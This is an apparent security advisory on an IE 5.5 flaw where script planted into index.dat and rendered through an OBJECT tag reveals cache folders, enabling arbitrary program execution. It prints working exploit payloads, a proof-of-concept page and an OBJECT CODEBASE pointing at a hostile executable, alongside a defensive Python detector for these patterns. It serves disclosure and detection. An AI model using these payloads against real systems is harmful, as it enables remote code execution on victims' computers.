COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.5, probably 5.x and Outlook/Outlook Express (not tested)

PROBLEM

    The following is based on Georgi Guninski's security advisory #29.
    It is a completely different issue from advisory #28, "IE
    5.x/Outlook allows executing arbitrary programs using .chm files
    and temporary internet files folder", though both use some common
    techniques.

    There is a security vulnerability in IE 5.5 (probably 5.x and
    Outlook) which allows executing arbitrary programs by using
    OBJECT TYPE="text/html" to parse index.dat, which reveals the
    location of the Temporary Internet Files folder.  This may lead to
    taking full control over the user's computer.

    If one can inject a file onto the user's local disk and knows its
    location, it is possible to execute arbitrary programs in at least
    two ways:

        1) window.showHelp("c:\\dir\\hostile.chm")
        2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">

    So the question arises of how to inject a specified file onto the
    user's disk.  A good way is to use the Temporary Internet Files
    folder, which contains cached documents and files.  The problem is
    that it has several subfolders with random names.  But there is a
    special file, "index.dat", which is something like a catalog or
    registry: it contains all visited URLs and, more importantly, the
    names of the random folders at its beginning.  It is located in
    C:/WINDOWS/Temporary Internet Files/Content.IE5/ under Win9x and in
    C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet
    Files/Content.IE5/ under Win2K, so under Win2K the username of the
    current user must be known or guessed, which makes things more
    difficult.

    It is possible to inject JavaScript into it simply by doing:

        window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")

    because this URL will be written into it.

    So if it can be parsed by IE and the JavaScript executed, the names
    of the random folders will be known.  But Microsoft tries to
    prevent parsing non-HTML files and issued a security bulletin in
    August:

        http://www.microsoft.com/technet/security/bulletin/MS00-055.asp

    But it is still possible to parse (render) non-HTML files in the
    following way:

        <OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>

    So the exploit scenario is:
    1) inject JavaScript into index.dat by

        window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")

       The JavaScript is executed in index.dat and has access to its
       content, which allows finding the random directory names
    2) parse/render index.dat by:

        <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>

    3) After the Temporary Internet Files folders are known, inject for
       example .chm files by:

        <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>

    4) Do

        window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
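    The scenario above leaves two artefacts a defender can look for:
    request URLs whose query string carries HTML markup (the way script
    is planted into index.dat) and page markup containing an OBJECT
    tag whose DATA or CODEBASE points at a local file such as
    index.dat.  The following Python script is an added example, not
    code from the advisory or from Guninski; the log lines and the HTML
    it scans are constructed here for illustration, and the field
    layout "<client> <method> <url>" is an assumed log format.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample proxy log, one request per line: "<client> <method> <url>"
# (assumed layout; not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 GET http://intranet.example/index.html
10.0.0.5 GET http://somehost.example/index.html?<SCRIPT>JSCODE</SCRIPT>
10.0.0.7 GET http://somehost.example/search?q=%3Cscript+src%3D%22http%3A//third-party.example/x.js%22%3E
10.0.0.9 GET http://cdn.example/lib.js?v=2
"""

# Constructed sample page markup (placeholder CLSID, not a real control).
SAMPLE_HTML = """
<html><body>
<OBJECT DATA="http://www.example.com/widget.html" TYPE="text/html"></OBJECT>
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
<OBJECT CLASSID="clsid:PLACEHOLDER-CLSID" CODEBASE="C:\\DIR\\HOSTILE.EXE"></OBJECT>
<img src="logo.png">
</body></html>
"""

# HTML tags that have no business inside a query string.
MARKUP_IN_QUERY = re.compile(r"<\s*(script|object|iframe)\b", re.IGNORECASE)

# file: URLs, drive-letter paths and UNC paths.
LOCAL_PATH = re.compile(r"^(file:|[a-z]:[\\/]|\\\\)", re.IGNORECASE)

OBJECT_TAG = re.compile(r"<\s*object\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def query_carries_markup(url: str) -> bool:
    """True if the percent-decoded query string embeds a SCRIPT/OBJECT/IFRAME tag.

    Such a URL is what the advisory uses to get script written into
    index.dat; decoding twice also catches double-encoded variants."""
    query = unquote(unquote(urlsplit(url).query))
    return bool(MARKUP_IN_QUERY.search(query))


def flag_log_lines(log_text: str) -> list[tuple[str, str]]:
    """Return (client, url) for every request whose query string carries markup."""
    flagged = []
    for line in log_text.splitlines():
        fields = line.split(maxsplit=2)
        if len(fields) != 3:
            continue  # skip malformed lines rather than crash on them
        client, _method, url = fields
        if query_carries_markup(url):
            flagged.append((client, url))
    return flagged


def points_to_local_file(value: str) -> bool:
    return bool(LOCAL_PATH.match(value.strip()))


def risky_object_tags(html: str) -> list[tuple[str, str]]:
    """Return (attribute, value) for OBJECT tags that reference local files.

    Flags TYPE="text/html" objects whose DATA is a local path (rendering a
    non-HTML local file such as index.dat) and any CODEBASE that is a local
    path.  The scan runs over the raw text, so a tag hidden inside a
    JavaScript string (as in the advisory's demo) is found as well."""
    hits = []
    for tag in OBJECT_TAG.finditer(html):
        attrs = {}
        for a in ATTR.finditer(tag.group(0)):
            # exactly one of the three value groups matched
            attrs[a.group(1).lower()] = next(v for v in a.groups()[1:] if v is not None)
        data = attrs.get("data", "")
        codebase = attrs.get("codebase", "")
        if attrs.get("type", "").lower() == "text/html" and points_to_local_file(data):
            hits.append(("data", data))
        if points_to_local_file(codebase):
            hits.append(("codebase", codebase))
    return hits


if __name__ == "__main__":
    for client, url in flag_log_lines(SAMPLE_LOG):
        print(f"markup in query from {client}: {url}")
    for attr, value in risky_object_tags(SAMPLE_HTML):
        print(f"OBJECT {attr.upper()} references local file: {value}")
```

    Matching on the raw markup rather than a parsed DOM is deliberate:
    the demo page builds its OBJECT tag inside a JavaScript string and
    writes it with document.writeln(), so a DOM built before the script
    runs would not contain it.  The remote-DATA object in the sample is
    not flagged, since only local file references are the concern here.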

    The presence of the random Temporary Internet Files folder names in
    index.dat is very dangerous: it means that every Cross Frame
    Security vulnerability, or any vulnerability that reads local files,
    may lead to executing arbitrary programs.  This means that a lot of
    previous vulnerabilities are much more serious than was realized
    when they were discovered.

    The code is:

    --------parsedat.html------------------------------------------------
    This demo is for Windows 9x - you must modify the source for Win2K.
    You may need to wait a few minutes if you have a slow computer.  If
    you have a Pentium 500 or better, or use Win2K, probably much less.
    A window with location "about:blank" is expected to be opened,
    containing index.dat - the file where the random names of the
    temporary internet files directories are kept (they are the random
    names at the beginning of the window) and the list of all visited
    URLs, among other stuff.  Once the temporary internet files
    directories are known it is possible to execute arbitrary programs
    through cached files and showHelp() or OBJECT CODEBASE="...".
    If you don't see a window with location "about:blank" and the content
    of index.dat, close IE and visit the page again.
    <SCRIPT>
    // Open a URL whose query string carries script; IE writes that URL into index.dat.
    b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
    // OBJECT tag that renders index.dat as HTML (Win9x path).
    s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
    // Win2K path - you must change "Administrator" to the actual user name.
    //s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
    // Give the cache a few seconds to be written before rendering index.dat.
    setTimeout("document.writeln(s)",5000);
    </SCRIPT>

    A demonstration which opens index.dat, which contains the Temporary
    Internet Files folder names and the list of all visited URLs, is
    available at:

        http://www.guninski.com/parsedat.html

SOLUTION

    Disable Active Scripting and move the Temporary Internet Files
    folder to an unpredictable location.